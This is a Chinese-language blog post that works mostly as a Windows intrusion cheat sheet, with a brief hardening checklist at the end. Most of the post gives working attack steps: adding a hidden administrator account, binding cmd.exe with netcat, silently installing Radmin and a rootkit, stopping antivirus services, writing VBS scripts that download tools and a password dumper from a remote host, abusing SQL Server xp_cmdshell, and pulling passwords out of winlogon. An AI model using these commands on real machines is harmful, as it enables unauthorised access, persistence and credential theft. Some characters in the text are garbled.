(1)
运行
cmd
命令
l
通过在“运行”菜单中执行
cmd
或者
command
指令。
l
通过程序的附件执行“命令提示符”
l
直接在反弹的
shell
中(一般是远程控制软件中)
说明:在有些情况下,管理员对
cmd
命令进行了限制,这就需要更换
cmd.exe
为其它一个名字,或者从本地上传一个文件上去。
(2)
创建目录:
mkdir test
(3)
更换当前路径:
cd test
(4)
生成文件:
netstat �Can >netlog.txt
(5)
查看文件属性:
dir /a /s
(6)
查找指定网络连接:
netstat �Can |find “80” /3389
(7)
给文件加上
/
还原属性:
attrib �Ch-s-r-a
(8)
创建新文件夹
: mkdir hacker
(9)
移动文件
netlog.txt
到
hacker
文件夹
l
move netlog.txt c:hacker\
l
move netlog.txt c:\test\hacker\
(
10
)添加新管理员
hacker
net user hacker wshacker /add
net localgroup administrators hacker /add
net user hacker
net user hacker wshakcer!!
(
11
)使用
nc
命令
l
监听命令
netstat �Can |find “8080”
nc -vv -l -p 8080 / nc -vv -l -p 8080
nc -l -p port>log.txt
l
程序定向
nc -l -p 5277 -t -e cmd.exe
在对方机器上运行
,
使其成为一台
telnet
服务器
.
l
扫描对方端口
nc -v -ip port
eg nc -v 172.16.81.1 80
l
扫描对方
tcp
端口
nc -v -z ip port -port
l
扫描对方
udp
端口
nc -v -z -u ip port-port
l
上传文件
本地机器上执行
:nc -v -n ip port<x:\svr.exe
远程机器上执行
:nc -v -l -p port >y:\svr.exe
(
12
)查看系统时间:
net time net view /net session /net use
(
13
)使用
at
命令:
at
查看当前所有列表
at \\ip
时间
“
命令
”
at
9:01
“net user aspnet wshakcer /add ”
net time
说明该命令一般是配合
net time
命令使用
(
14
)查看远程终端连接情况:
query user /quser
(
15
)注销远程终端用户:
logoff
1/2/3
(
16
)命令模式安装
radmin
远程控制软件
前提:将
radmin
的三个服务端文件(
admdll.dll
,
raddrv.dll
,
r_server.exe
)放入一个文件夹,并且已经获得了被入侵机器的管理员密码。
net use \\ip\admin$ “
密码
” /u
:
administrator
copy *.* \\192.168.45.219\admin$\system32\
psexec \\192.168.45.219 -u user �Cp password cmd
然后执行命令:
netstat -an |find "4899"
net stop r_server
r_server.exe /pass:wshacker /port:4899 /save /silence
r_server.exe /install /silence
net start r_server
net start r_server
netstat -an |find "4899"
netstat -an |find "4899"
(
17
)安装
rootkit
将
ntboot.exe ntboot.dll
拷入系统目录,然后执行
ntboot �Cinstall
命令,
rootkit
对
80
端口有效,尤其对提供
web
服务的端口。
客户端调用比较简单:
cli->ip
地址
->80
端口
(
18
)停止和启动服务。
Net stop /net start “
服务名称
”
以下命令停止杀毒软件
net stop "Symantec AntiVirus"
net stop "Symantec AntiVirus Definition Watcher"
net stop "Symantec Event Manager"
net stop "Symantec Settings Manager"
net stop "System Event Notification"
(
19
)获取网络配置情况:
ipconfig /all
(
20
)使用脚本下载
echo open 192.168.45.219>b
echo ftp>>b
echo ftp>>b
echo bin>>b
echo get radmin.exe>>b
(可以是一系列的可执行文件)
echo bye >>b
ftp -s:b
del
b
echo open 192.168.45.219 >1
echo user bin bin >>1
echo bin >>1
echo get wt.exe >>1
echo bye >>1
ftp -n -s:1
del
1
(
21
)
dl.vbe
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe
cscript dl.vbe [url]http://192.168.45.219/tools/AdmDll.dll[/url] AdmDll.dll
cscript dl.vbe [url]http://192.168.45.219/tools/raddrv.dll[/url] raddrv.dll
cscript dl.vbe [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe
cscript dl.vbe [url]http://192.168.45.219/tools//mt.exe[/url] mt.exe
cscript dl.vbe [url]http://192.168.45.219/tools/wt.exe[/url] wt.exe
(22). iget.vbe
net stop "RsRavMon Service"
net stop "Rising Personal Firewall Service"
net stop "
Rising
Process
Communication
Center
"
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
echo Set xPost = createObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = createObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe
dir iget.vbs
cscript iget.vbe [url]http://192.168.45.219/tools/AdmDll.dll[/url] AdmDll.dll
cscript iget.vbe [url]http://192.168.45.219/tools/raddrv.dll[/url] raddrv.dll
cscript iget.vbe [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe
cscript iget.vbe [url]http://192.168.45.219/tools/mt.exe[/url] mt.exe
cscript iget.vbe [url]http://192.168.45.219/tools/wt.exe[/url] wt.exe
cscript iget.vbe [url]http://192.168.45.219/tools/ntboot.exe[/url] ntboot.exe
cscript iget.vbe [url]http://192.168.45.219/tools/ntboot.dll[/url] ntboot.dll
cscript iget.vbe [url]http://192.168.45.219/tools/server.exe[/url] server.exe
cscript iget.vbe [url]http://192.168.45.219/tools/lsaext.dll[/url] lsaext.dll
cscript iget.vbe [url]http://192.168.45.219/tools/PwD.exe[/url] PwD.exe
cscript iget.vbe [url]http://192.168.45.219/tools/sfind.exe[/url] sfind.exe
cscript iget.vbe [url]http://192.168.45.219/tools/fp.exe[/url] fp.exe
cscript iget.vbe [url]http://192.168.45.219/tools/pulist.exe[/url] pulist.exe
cscript iget.vbe [url]http://192.168.45.219/tools/pskill.exe[/url] pskill.exe
(
23
)使用软件下载
wt down [url]http://192.168.45.219/tools/AdmDll.dll[/url]
wt down [url]http://192.168.45.219/tools/regsrc.exe[/url]
wt down [url]http://192.168.45.219/tools/raddrv.dll[/url]
mt -netget [url]http://192.168.45.219/tools/ntboot.dll[/url] ntboot.dll
mt -netget [url]http://192.168.45.219/tools/ntboot.exe[/url] ntboot.exe
mt -netget [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe
mt -netget [url]http://192.168.45.219/tools/PwD.exe[/url] PwD.exe
(
24
)在网站上复制文件
copy c:\tmp\*.exe c:\winnt\system32\inetsrv\data\
使用网页木马的文件上传功能。
(
25
)使用
SQL Server 2000
的
xp_cmdshell
exec master.dbo.xp_cmdshell ‘
命令
’ --
执行命令
use master �C
使用哪一个数据
exec master.dbo.xp_cmdshell 'net user aspnet wshacker /add'
exec master.dbo.xp_cmdshell 'net localgroup administrators asp2net /add'
将脚本通过网页提交
exec xp_cmdshell 'echo set fso1=createobject("scripting.filesystemobject")>c:\read.vbs'
exec xp_cmdshell 'echo Set WshShell = Wscript.CreateObject("Wscript.Shell")>>c:\read.vbs'
exec xp_cmdshell 'echo spa=WshShell.Environment("process")("windir") >>c:\read.vbs'
exec xp_cmdshell 'echo set fil =fso1.opentextfile(spa & "\system32\aa.txt") >>c:\read.vbs'
exec xp_cmdshell 'echo do while not fil.atendofstream>>c:\read.vbs'
exec xp_cmdshell 'echo nr=fil.readline>>c:\read.vbs'
exec xp_cmdshell 'echo if left(nr,4)="Path" then>>c:\read.vbs'
exec xp_cmdshell 'echo pa=mid(nr,instr(nr,")")+3,len(nr)-instr(nr,")")-3)>>c:\read.vbs'
exec xp_cmdshell 'echo exit do>>c:\read.vbs'
exec xp_cmdshell 'echo end if>>c:\read.vbs'
exec xp_cmdshell 'echo loop>>c:\read.vbs'
exec xp_cmdshell 'echo set fil1 =fso1.opentextfile(pa&"\dd.asp",2,true)>>c:\read.vbs'
exec xp_cmdshell 'echo fil1.writeline "<%response.write request.servervariables(""APPL_PHYSICAL_PATH"")%>">>c:\read.vbs
'
(26)
查找用户的密码
:
l
使用
pulist.exe
查看用户的进程
,
找到
winlogon
的
PID.
l
然后运行
findpass.exe
域名
(
机器名
)
用户名
PID
例如
: findpass.exe a administrator 204
mt �Cfindpass
[url]ftp://192.168.99.254[/url]
(27)
使用
ps
l
显示所有进程
ps /a
dir *.exe>exeback.txt & dir *.dll>dllback.txt
ps.exe /a /m >nowdlls.txt
(
28
)压缩文件
rar a -r myrar d:\sinba
(
29
)计算机管理控制台程序
compmgmt.exe
dcomcnfg.exe
组件服务程序
devmgmt.exe
设备管理器程序
fsmgmt.exe
共享文件管理
lusrmgr.msc
本地用户和组
eventvwr.msc
日志管理器
ht
文件
ht -fku
ht -key mima
ht -ps
htk -fku
htk -key 218123409252
htk -ps
htk -pslist
htk -pass
htk -fpass
htk -pss 192.168.1.6
htk -s 192.168.1.6 -show -run
htk -share -add 211.72.212.81 admin$
htk -share -add 211.72.50.10 admin$
安全防护
(1)
查看运行服务与端口
fport /p
(
2
)查看开放的文件及其进程
handle.exe([url]http://www.sysinternals.com/ntw2k/freeware/handle.shtml.[/url])
handle -p iexplore handle
(
3
)进行登陆等时间的审计(
gpedit
)
(
4
)严格安全日志的管理(应用程序日志、系统日志、安全时间日志)
严格限制%SystemRoot%\system32\config
目录访问权限,仅限管理员访问
eventvwr.msc
更改日志文件的默认大小
(
5
)去掉默认文件共享
HKey_Local_Machine\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
新建
DWORD
键“AutoShareServer”值为0
net share
(6)加密用户所在文件的临时目录temp
C:\Documents and Settings\<username>\Local Settings
(7
)清楚页面文件
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
将
ClearPageFileAtShutdown
键值设置为
1
(
8
)严格控制应用程序的访问权限
使用
win2000
资源
AppSec
本文出自 “simeon技术专栏” 博客,谢绝转载!